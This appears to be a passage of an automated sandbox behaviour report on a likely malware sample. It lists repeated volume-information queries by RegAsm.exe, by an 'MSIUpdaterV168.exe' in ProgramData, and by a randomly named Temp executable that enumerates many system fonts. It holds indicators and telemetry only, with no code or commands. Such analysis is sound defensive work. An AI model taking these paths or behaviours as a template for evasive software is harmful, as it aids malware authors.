Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
